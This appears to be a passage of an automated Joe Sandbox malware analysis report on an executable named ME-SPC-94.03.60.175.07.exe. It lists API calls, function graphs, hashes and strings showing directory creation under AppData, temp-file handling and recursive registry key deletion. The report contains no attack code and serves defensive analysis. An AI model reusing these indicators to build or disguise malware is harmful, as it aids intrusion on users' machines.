                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID: Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll
                                                  • API String ID: 2531174081-2416552334
                                                  • Opcode ID: 241caa620ce1fcc58b3a3595d79cd8debb0f013b3e7c164dabd01d0a25878295
                                                  • Instruction ID: 09d17c59ce7287a2cbf3dc662f19c44123261f726eb293d34c68041fb2ac0666
                                                  • Opcode Fuzzy Hash: 241caa620ce1fcc58b3a3595d79cd8debb0f013b3e7c164dabd01d0a25878295
                                                  • Instruction Fuzzy Hash: CA21A131900558BBCB219FA5DD849DFBFB8EF54310F14807AF904B62A0C3798A81CFA8

                                                  Control-flow Graph

                                                  APIs
                                                  • ReadFile.KERNELBASE(?,?,?,?), ref: 004025DB
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402616
                                                  • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 00402639
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040264F
                                                    • Part of subcall function 00405C37: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                    • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                  • String ID: 9
                                                  • API String ID: 1149667376-2366072709
                                                  • Opcode ID: 14d7a1a443259207830479a75009ee39c6dacd7ae2e8022bb32dc9fb2f0741b6
                                                  • Instruction ID: 34008a6f5bb5370994306dbe4266d00811a1d2e87b5126a94146f67fdcf6739f
                                                  • Opcode Fuzzy Hash: 14d7a1a443259207830479a75009ee39c6dacd7ae2e8022bb32dc9fb2f0741b6
                                                  • Instruction Fuzzy Hash: 0E51E771E04209ABDF24DF94DE88AAEB779FF04304F50443BE511B62D0D7B99A42CB69

                                                  Control-flow Graph

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00403192
                                                    • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                  • WriteFile.KERNELBASE(0040BE90,0040E236,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                  • SetFilePointer.KERNELBASE(00004E18,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: File$Pointer$CountTickWrite
                                                  • String ID: 6@
                                                  • API String ID: 2146148272-2414527261
                                                  • Opcode ID: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                  • Instruction ID: 34320a24581f7621071559271f75aff2a33e70c32c739a51ea230fcf3b1a2f41
                                                  • Opcode Fuzzy Hash: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                  • Instruction Fuzzy Hash: CB418B72504205DFDB109F29EE84AA63BADF74431671441BFE604B22E1C7B96D418BEC

                                                  Control-flow Graph (graph image; blocks marked Executed / Not Executed)

                                                  control_flow_graph: function at 004015B9 (basic blocks 4015b9-4029d6; calls CreateDirectoryW, GetLastError, GetFileAttributesW, SetCurrentDirectoryW and subroutines 402b3a, 405a3e, 4059c0, 401423, 405f48; graph edge list omitted)
                                                  APIs
                                                    • Part of subcall function 00405A3E: CharNextW.USER32(?,?,00424EF0,?,00405AB2,00424EF0,00424EF0,?,?,771B2EE0,004057F0,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"), ref: 00405A4C
                                                    • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
                                                    • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69
                                                  • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                  • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Eneforhandler231,?,00000000,000000F0), ref: 00401630
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Eneforhandler231, xrefs: 00401623
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Eneforhandler231
                                                  • API String ID: 3751793516-1862805445
                                                  • Opcode ID: 9b673ddbf1d69572a6be76a75328456f52fe096521e7ed3c2b5c74dd951979b8
                                                  • Instruction ID: 602e027c19ef8137931421d3e2870900c2c1aa36f58208ee64056e3add0ea48c
                                                  • Opcode Fuzzy Hash: 9b673ddbf1d69572a6be76a75328456f52fe096521e7ed3c2b5c74dd951979b8
                                                  • Instruction Fuzzy Hash: 4F11C271904200EBCF206FA0CD449AE7AB4FF14369B34463BF881B62E1D23D49419A6E

                                                  Control-flow Graph (graph image; blocks marked Executed / Not Executed)

                                                  control_flow_graph: function at 00402B7A (basic blocks 402b7a-402c2d; calls RegOpenKeyExW, RegEnumKeyW, RegCloseKey, RegDeleteKeyW, subroutine 4062b2 and itself recursively at 402b7a; graph edge list omitted)
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B9B
                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Close$DeleteEnumOpen
                                                  • String ID:
                                                  • API String ID: 1912718029-0
                                                  • Opcode ID: b547f4a97addcc1e8c82d95905b84b8973278d2723117ef79469a300e8f1f4e9
                                                  • Instruction ID: 39c85bfe7ca74ada2351cc0a51ccebcd1f3e21716521df4e7e96f28c7df0de5f
                                                  • Opcode Fuzzy Hash: b547f4a97addcc1e8c82d95905b84b8973278d2723117ef79469a300e8f1f4e9
                                                  • Instruction Fuzzy Hash: 5B116A31904008FEEF229F90DE89EAE3B7DFB14348F100476FA01B00A0D3B59E51EA69

                                                  Control-flow Graph (graph image; blocks marked Executed / Not Executed)

                                                  control_flow_graph: function at 10001759 (basic blocks 10001759-100018a8; calls GlobalFree, FreeLibrary and subroutines 10001b18, 10002286, 100022d0, 100024a9, 100015b4, 10001272, 10002b5f, 100028a4, 10002645, 1000246c, 1000153d; graph edge list omitted)
                                                  APIs
                                                    • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                    • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                    • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                  • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                  • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                  • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                    • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                    • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                    • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1479157136.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000004.00000002.1479140415.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000004.00000002.1479171762.0000000010003000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000004.00000002.1479188233.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_10000000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc$Librarylstrcpy
                                                  • String ID:
                                                  • API String ID: 1791698881-3916222277
                                                  • Opcode ID: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                  • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                  • Opcode Fuzzy Hash: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                  • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

                                                  Control-flow Graph (graph image; blocks marked Executed / Not Executed)

                                                  control_flow_graph: function at 00405E15 (basic blocks 405e15-405e8c; calls RegOpenKeyExW, RegQueryValueExW, RegCloseKey; graph edge list omitted)
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E3F
                                                  • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E60
                                                  • RegCloseKey.ADVAPI32(?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E83
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID: Call
                                                  • API String ID: 3677997916-1824292864
                                                  • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                  • Instruction ID: 600534e839ec184522a2ed62e812a695e1e378dc1a2fe7ff70d8343822b3fb0e
                                                  • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                  • Instruction Fuzzy Hash: A7015A3114020EEACB218F56EC08EEB3BA8EF54390F00413AF944D2220D334DA64CBE5
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00405C01
                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user~1\AppData\Local\Temp\), ref: 00405C1C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-3083371207
                                                  • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                  • Instruction ID: 094b443934c56d738417ad06ce23117a41e39d67b54f0ae1535361756efc6c0b
                                                  • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                  • Instruction Fuzzy Hash: 45F09676A04208BBDB009F59DC05E9BB7B8EB91710F10803AEA01E7151E2B0AD448B54
                                                  APIs
                                                    • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 0040623F
                                                    • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                    • Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00406253
                                                    • Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00406266
                                                  • CreateDirectoryW.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00403347
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$CreateDirectoryPrev
                                                  • String ID: 1033$C:\Users\user~1\AppData\Local\Temp\
                                                  • API String ID: 4115351271-3049706366
                                                  • Opcode ID: bbd1dcb3637595afbe6b96ae3bcfafd58112e7b3325432cb54e87bfcccc6df60
                                                  • Instruction ID: 64a45b222adfb8bd76fd8b495f2d7cf88aee328212c381153bc1e0c9699f7593
                                                  • Opcode Fuzzy Hash: bbd1dcb3637595afbe6b96ae3bcfafd58112e7b3325432cb54e87bfcccc6df60
                                                  • Instruction Fuzzy Hash: 22D0C92251AA3135C551372A7D06FCF295C8F0A329F12A477F809B90C2CB7C2A8249FE
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                  • Instruction ID: dca007468fed7c27dd914b546e5ea1ac9ab056a0c62ecf1bea7b7831388965f7
                                                  • Opcode Fuzzy Hash: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                  • Instruction Fuzzy Hash: 58A14471E00229DBDF28CFA8C8447ADBBB1FF48305F15816AD856BB281C7785A96CF44
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                  • Instruction ID: e31ab10654d3133c4bbe562e0396aaf9f668a3464ceaf5ac7e335a669e1e1d03
                                                  • Opcode Fuzzy Hash: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                  • Instruction Fuzzy Hash: 8E912371E00228CBEF28CF98C8587ADBBB1FF44305F15816AD856BB291C7785A96DF44
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                  • Instruction ID: e0c60a541a5106e25e0a2f50f35f038ee2aa27f15edb78bccdd8f3c871378321
                                                  • Opcode Fuzzy Hash: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                  • Instruction Fuzzy Hash: 2C814471D04228DFDF24CFA8C8487ADBBB1FB45305F25816AD456BB281C7789A96CF44
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
